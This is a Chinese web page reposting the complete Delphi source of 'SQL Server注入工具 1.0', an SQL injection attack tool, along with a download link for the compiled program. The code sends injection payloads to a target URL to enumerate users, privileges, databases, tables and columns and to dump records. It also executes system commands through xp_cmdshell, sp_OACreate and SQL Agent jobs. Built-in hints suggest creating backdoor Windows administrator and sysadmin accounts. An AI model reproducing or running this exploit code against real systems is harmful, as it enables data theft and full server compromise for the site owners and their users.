分享
 
 
 

SQL Server注入工具 1.0

王朝delphi·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名,表名,字段名及记录的信息,由于网速的原因,目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令,同时可回显显示。

本程序只供测试研究使用,由此软件造成的后果一概不负责任,由于编写比较仓促,代码难免有纰漏之处,欢迎大家批评指正。

下载地址:http://free.efile.com.cn/hnxyy/NBSI.exe

作者:Hnxyy QQ:19026695

2004.12.16 北京

FireFox技术交流论坛

http://www.wrsky.com

临时访问地址

http://firefoxer.nease.net

It is all beginnings free

It is all ruin to be privately owned

D7原代码:

unit untmain;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,

IdTCPClient, OleCtrls, SHDocVw,mshtml;

type

TForm1 = class(TForm)

Label1: TLabel;

EdtUrl: TEdit;

BtnCheck: TButton;

Label2: TLabel;

GroupBox1: TGroupBox;

Label7: TLabel;

Label3: TLabel;

Label4: TLabel;

Label5: TLabel;

Label6: TLabel;

EdtMuliCase: TEdit;

EdtQuery: TEdit;

EdtUser: TEdit;

EdtPower: TEdit;

EdtDbName: TEdit;

Memo1: TMemo;

GroupBox2: TGroupBox;

cbDisp: TCheckBox;

EdtCommand: TEdit;

rbCmd: TRadioButton;

rbOA: TRadioButton;

BtnExecute: TButton;

GroupBox3: TGroupBox;

Memo2: TMemo;

wb: TWebBrowser;

BtnStop: TButton;

rbJob: TRadioButton;

BtnCancel: TButton;

procedure BtnCheckClick(Sender: TObject);

procedure BtnExecuteClick(Sender: TObject);

procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;

var URL: OleVariant);

procedure BtnStopClick(Sender: TObject);

procedure rbCmdClick(Sender: TObject);

procedure rbOAClick(Sender: TObject);

procedure rbJobClick(Sender: TObject);

procedure FormShow(Sender: TObject);

procedure BtnCancelClick(Sender: TObject);

private

{ Private declarations }

tag:integer;

isFinish,isCancel:boolean;

function Get(URL: string): boolean;

function GetWBMsg(URL: string): string;

Function StrToNChar(DbName,TName:string): string;

procedure SetRdbCheck(rd:TRadioButton);

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);

const

vFieldCount=5;

PowerStr :array[0..6] of string=(

'sysadmin','dbcreator','diskadmin',

'processadmin','serveradmin',

'setupadmin','securityadmin');

var

Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;

i,j,k,iCount:integer;

VerStr,ValueStr,CountStr,Powers:string;

FieldStr,FieldOrdStr,CFieldStr:string;

vfield:OleVariant;

begin

try

EdtMuliCase.Text :='';

EdtQuery.Text :='';

EdtUser.Text :='';

EdtPower.Text :='';

EdtDbName.Text :='';

Url:=trim(EdtUrl.Text);

isFinish :=False;

vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);

Memo1.Clear;

Screen.Cursor :=crHourGlass;

//判断是否支持多句查询

if Get(Url+';declare%20@a%20int--') then

begin

EdtMuliCase.Text :='支持';

end else

begin

EdtMuliCase.Text :='不支持';

end;

//判断是否支持子查询

if get(Url+'%20and%20(Select%20count(1)%20from%20[sysobjects])>=0') then

begin

EdtQuery.Text :='支持';

end else

begin

EdtQuery.Text :='不支持';

end;

//取得当前用户

EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');

//取得当前用户登录的服务器角色成员

for i:=0 to High(PowerStr) do

begin

if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER('''+PowerStr[i]+''')%20as%20varchar(1))=1') then

begin

Powers :=Powers+PowerStr[i]+'|';

end;

end;

if Powers='' then

EdtPower.Text :='未知'

else EdtPower.Text :=Powers;

//指明当前用户是否为 db_owner 固定数据库角色的成员

{ if get(Url+'%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1') then

begin

EdtPower.Text :='db_owner';

end else

begin

EdtPower.Text :='未知';

end; }

//得到当前SQL Server的版本号

VerStr :=GetWBMsg(Url+'%20and%20char(124)%2B@@version%2Bchar(124)>0');

Memo1.Lines.Add('当前版本号:'+VerStr);

Memo1.Lines.Add('');

//取得数据库名

DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');

EdtDbName.Text :=DbName;

if (DbName='') or (DbName='未知') then

begin

Memo1.Lines.Add('未知的数据库,操作终止!');

exit;

end;

Memo1.Lines.Add('当前数据库:'+DbName);

BtnStop.Visible :=true;

BtnCheck.Visible :=False;

//猜解表名

Memo1.Lines.Add('');

Memo1.Lines.Add('开始猜解表名.....');

Memo1.Lines.Add('#######################');

for i:=1 to 1000 do

begin

TName :='';

TName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))'+

'%20from(Select%20Top%20'+inttostr(i)+'%20id,name%20from%20['+DbName+']..[sysobjects]'+

'%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--');

if (TName0=TName) or (isFinish) then

Break;

Memo1.Lines.Add('表名 :'+TName);

//猜解列名

Memo1.Lines.Add('');

Memo1.Lines.Add('开始猜解列名.....');

Memo1.Lines.Add('#######################');

NCharStr :='';

NCharStr :=StrToNChar(DbName,TName);

j:=1;

while j<1000 do

begin

ColName :='';

ColName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)'+

'%20as%20varchar(8000))%20from%20(Select%20Top%20'+inttostr(j)+'%20colid,name'+

'%20From%20['+DbName+']..[syscolumns]%20Where%20id%20=%20'+NCharStr+

'%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0;--');

if (ColName0=ColName) or (isFinish) then

j:=1000

else begin

Memo1.Lines.Add('列名 '+inttostr(j)+' :'+ColName);

if j<vFieldCount+1 then

begin

vfield[j-1] :=ColName;

end;

ColName0 :=ColName;

inc(j);

end;

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('列名猜解结束.....');

Memo1.Lines.Add('');

//猜解数据

Memo1.Lines.Add('开始猜解数据.....');

Memo1.Lines.Add('#######################');

CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+

'%2Bchar(124)%20From%20['+TName+']%20Where%201=1)>0;--');

try

iCount :=strtoint(CountStr);

except

Memo1.Lines.add('出现意外数据,操作终止!');

exit;

end;

Memo1.Lines.Add('表 '+TName+' :共有 '+CountStr+' 条数据。');

CFieldStr :='';

FieldStr :='';

FieldOrdStr :='';

for k:=0 to vFieldCount-1 do

begin

if k=0 then

begin

CFieldStr :='isNull(cast(['+vfield[0]+']%20as%20varchar(8000)),char(32))';

FieldStr :='['+vfield[0]+']';

FieldOrdStr :='['+vfield[0]+']%20desc';

end else

begin

CFieldStr :=CFieldStr+'%2B%20%2BisNull(cast(['+vfield[k]+']%20as%20varchar(8000)),char(32))';

FieldStr :=FieldStr+',['+vfield[k]+']';

FieldOrdStr :=FieldOrdStr+',['+vfield[k]+']%20desc';

end;

end;

k:=1;

while k<iCount+1 do

begin

ValueStr :='';

ValueStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20char(124)%2B'+CFieldStr+'%2Bchar(124)%20From%20(Select'+

'%20Top%20'+inttostr(k)+'%20'+FieldStr+'%20From%20['+DbName+']..['+TName+']%20Where%201=1'+

'%20Order%20by%20'+FieldStr+')%20T%20Order%20by%20'+FieldOrdStr+')>0;--');

if isFinish then

k:=iCount+1;

Memo1.Lines.Add('数据 '+inttostr(k)+' :'+ValueStr);

inc(k);

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('数据猜解结束.....');

Memo1.Lines.Add('');

TName0 :=TName;

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('表名猜解结束.....');

finally

Screen.Cursor :=crDefault;

BtnStop.Visible :=False;

BtnCheck.Visible :=True;

end;

end;

procedure TForm1.BtnExecuteClick(Sender: TObject);

var

Url,DbName,CommandStr:string;

ResultStr,CountStr:string;

iCount,i:integer;

begin

try

Url:=trim(EdtUrl.Text);

ResultStr :='';

CommandStr :='';

isCancel :=False;

CommandStr:=trim(EdtCommand.Text);

CommandStr:=StringReplace(CommandStr,'%','%25',[rfReplaceAll]);

CommandStr:=StringReplace(CommandStr,' ','%20',[rfReplaceAll]);

Memo2.Clear;

Screen.Cursor :=crHourGlass;

//取得数据库名

DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');

if (DbName='') or (DbName='未知') then

begin

Memo2.Lines.Add('未知的数据库,操作终止!');

exit;

end;

//Cmd_shell

//使用xp_cmdshell来运行系统命令

if rbCmd.Checked then

begin

//回显

if cbDisp.Checked then

begin

BtnCancel.Visible :=true;

BtnExecute.Visible :=False;

//第一种办法

//把命令执行的结果保存到一个本地文件中,然后将此文件的内容写入到新建的临时表进行输出

{CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'>C:\Command_Tmp.log'''+

';DROP%20TABLE%20[Command_Tmp]'+

';CREATE%20TABLE%20[Command_Tmp]([ResultTxt]%20varchar(7996)%20NULL)'+

';BULK%20INSERT%20['+DbName+']..[Command_Tmp]%20FROM%20''C:\Command_Tmp.log''%20WITH%20(KEEPNULLS)'+

';Alter%20Table%20[Command_Tmp]%20add%20[ID]%20int%20NOT%20NULL%20IDENTITY%20(1,1)--'; }

//第二种办法,直接把命令执行的结果写入数据库中输出,效率较高

CommandStr :=Url+';DROP%20TABLE%20[Command_Tmp];'+

'CREATE%20TABLE%20[Command_Tmp]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),'+

'%20[ResultTxt]%20varchar(1024)%20NULL);'+

'insert%20into%20[Command_Tmp](ResultTxt)%20EXEC%20MASTER..XP_CMDSHELL%20'''+

CommandStr+''';insert%20into%20[Command_Tmp]%20values%20(''g_over'')--';

if Get(CommandStr) then

begin

CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+

'%2Bchar(124)%20From%20[Command_Tmp]%20Where%201=1)>0;--');

try

iCount :=strtoint(CountStr);

except

Memo2.Lines.add('出现意外数据,操作终止!');

exit;

end;

for i:=1 to iCount do

begin

ResultStr :='';

ResultStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null'+

'%20then%20char(32)%20else%20char(124)%2BResultTxt%2Bchar(124)'+

'%20End%20From%20[Command_Tmp]%20Where%20ID='+IntToStr(i)+')=0;--');

if isCancel then

Break;

if (ResultStr<>'') and (ResultStr<>'未知') then

Memo2.Lines.Add(ResultStr);

end;

end;

if Get(Url+';DROP%20TABLE%20[Command_Tmp]--') then

begin

Memo2.Lines.Add('命令执行完成');

end;

end else

begin

CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';

if get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end;

end;

//OAcreate

//使用sp_OACreate来运行系统命令

if rbOA.Checked then

begin

//指明当前用户是否为 sysadmin 固定服务器角色的成员

if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then

begin

CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+

'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+

'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+

CommandStr+'''--';

if Get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end else

begin

Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');

exit;

end;

end;

//Job

//使用SQLSERVERAGENT的JOB来运行系统命令

if rbJob.Checked then

begin

//启动SQLSERVERAGENT

if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then

begin

Memo2.Lines.Add('SQLSERVERAGENT 启动成功!');

CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+

';exec%20sp_add_job%20''x'''+

';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+

CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+

';exec%20sp_start_job%20''x''--';

if get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end else

begin

Memo2.Lines.Add('SQLSERVERAGENT 启动失败,操作终止!');

exit;

end;

end;

finally

Screen.Cursor :=crDefault;

BtnExecute.Visible :=true;

BtnCancel.Visible :=false;

end;

end;

function TForm1.Get(URL: string): boolean;

var

IDHTTP: TIDHttp;

ss: String;

begin

Result:= False;

IDHTTP:= TIDHTTP.Create(nil);

try

try

idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错

idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问

ss:= IDHTTP.Get(URL);

if IDHTTP.ResponseCode=200 then

Result :=true;

except

//on E: Exception do

// Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);

end;

finally

IDHTTP.Free;

end;

end;

function TForm1.GetWBMsg(URL: string): string;

function GetResultStr(str:string):string;

var

istart,iend:integer;

ss:string;

begin

istart:=pos('|',str);

if istart>0 then

begin

ss:=copy(str,istart+1,length(str)-istart);

iend :=pos('|',ss);

if iend>0 then

begin

ss:=copy(ss,1,iend-1);

end;

end;

if ss='' then

Result :='未知'

else Result :=ss;

end;

var

ss:string;

begin

tag:=0;

wb.Navigate(URL);

while (tag=0) do

Application.ProcessMessages;

ss :=(wb.Document as IHTMLDocument2).Body.innerText;

Result :=GetResultStr(ss);

end;

function TForm1.StrToNChar(DbName, TName: string): string;

var

i:integer;

ss,str:string;

begin

ss:=DbName+'..'+TName;

for i:=1 to length(ss) do

begin

if i=1 then

str :='NCHAR('+inttostr(ord(ss[i]))+')'

else

str :=str+'%2BNCHAR('+inttostr(ord(ss[i]))+')';

end;

Result :='OBJECT_ID('+str+')';

end;

procedure TForm1.wbDocumentComplete(Sender: TObject;

const pDisp: IDispatch; var URL: OleVariant);

begin

//Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;

tag:=1;

end;

procedure TForm1.BtnStopClick(Sender: TObject);

begin

isFinish :=True;

BtnCheck.Visible :=true;

BtnStop.Visible :=False;

end;

procedure TForm1.SetRdbCheck(rd: TRadioButton);

begin

Memo2.Clear;

if rd=rbCmd then

begin

cbDisp.Enabled :=True;

Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');

Memo2.Lines.Add('');

Memo2.Lines.Add('net user test test /add');

Memo2.Lines.Add('net localgroup administrators test /add');

Memo2.Lines.Add('exec master..sp_addlogin test,test');

Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');

end;

if rd=rbOA then

begin

cbDisp.Enabled :=False;

Memo2.Lines.Add('使用sp_OACreate来运行系统命令');

end;

if rd=rbJob then

begin

cbDisp.Enabled :=False;

Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');

Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');

Memo2.Lines.Add('');

Memo2.Lines.Add('http://x.com/x.asp?a=1;exec master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');

end;

end;

procedure TForm1.rbCmdClick(Sender: TObject);

begin

SetRdbCheck(rbcmd);

end;

procedure TForm1.rbOAClick(Sender: TObject);

begin

SetRdbCheck(rbOA);

end;

procedure TForm1.rbJobClick(Sender: TObject);

begin

SetRdbCheck(rbJob);

end;

procedure TForm1.FormShow(Sender: TObject);

begin

SetRdbCheck(rbcmd);

end;

procedure TForm1.BtnCancelClick(Sender: TObject);

begin

isCancel :=True;

BtnExecute.Visible :=true;

BtnCancel.Visible :=false;

end;

end.

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有